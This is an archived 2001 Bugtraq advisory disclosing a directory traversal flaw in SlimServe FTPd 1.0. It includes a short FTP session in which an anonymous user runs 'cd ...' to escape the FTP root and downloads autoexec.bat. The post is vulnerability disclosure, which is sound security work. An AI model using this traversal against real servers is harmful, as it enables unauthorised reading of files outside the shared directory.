Bugtraq mailing list archives
Vulnerability in SlimServe FTPd
From: joetesta () HUSHMAIL COM
Date: Wed, 28 Feb 2001 18:35:23 -0500
----- Begin Hush Signed Message from joetesta () hushmail com ----- Vulnerability in SlimServe FTPd Overview SlimServe FTPd v1.0 is an ftp server available from http://www.whitsoftdev.com and http://www.download.com. A vulnerability exists which allows an attacker to break out of the ftp root using relative paths (ie: '...'). Details The following is an illustration of the problem. An ftp root of "c:\directory\directory" was used. % ftp localhost Connected to xxxxxxxxxx.rh.rit.edu. 220-SlimServe FTPd 1.0 :: www.whitsoftdev.com. 220 127.0.0.1 connected to xxxxxxxxxx.rh.rit.edu. User (xxxxxxxxxx.rh.rit.edu:(none)): anonymous 230 User anonymous logged in, proceed. ftp> cd ... 250 CWD command successful. ftp> get autoexec.bat 200 PORT command successful. 150 Opening data connection for "/.../autoexec.bat". 250 RETR command successful. ftp: 383 bytes received in 0.16Seconds 2.39Kbytes/sec. ftp> Solution No quick fix is possible. Vendor Status WhitSoft Development was contacted via <mwhitlock () whitsoftdev com> on Tuesday, February 20, 2001. No reply was received. - Joe Testa ( e-mail: joetesta () hushmail com / AIM: LordSpankatron ) ----- Begin Hush Signature v1.3 ----- BdKXWOXtYQqLBhT0XXyjq8msVo/YPcLXDI/inYF7lTcYeYbHERn9vjPhP0RMD5HnALmF aUXa8uek5Zpm2ZUukmAqMH03zA997x1MYtzHqvdpyU/7XfZIDynkrEoAp+beYPx72IED Xxve3ecqaTmG3BdenblWF9UrjkXcpIRNPi3PoAG91Ql3NikjXeVh+pUlogh3MDJ1XO1O /Z5tFkbqsqKIe6f5ezRD7oxtecFxOEtjMNYQuQTFEaUJBF3x7ydAxYvMLn1Xi+332cJ/ +lC/ra1vkow1kaCCTigBxTgdcueMgfduO0zqd2bFNdyWK8llHT/LFqDGPL3+zkex/U/e Sd9wEtkqBQuutyL/M9ZxY/r7XIrWdwm4VG+AKKEhsRCzenLgUaiJMGjp+8SnZ/+jf3bD ga/OkZztzza0pOBimOdlfRSWqSQX2iE77gpExvdo/4y5ZK+VSGx1zQ1q4k2yESNruhRH owvo0nu7h/9qW2/D+jnLgnz1j7D972sxrDJWwe+JZHof ----- End Hush Signature v1.3 ----- This message has been signed with a Hush Digital Signature. To verify the signature, please go to www.hush.com/tools Free, encrypted, secure Web-based email at www.hushmail.com
Current thread:
- Vulnerability in SlimServe FTPd joetesta (Feb 28)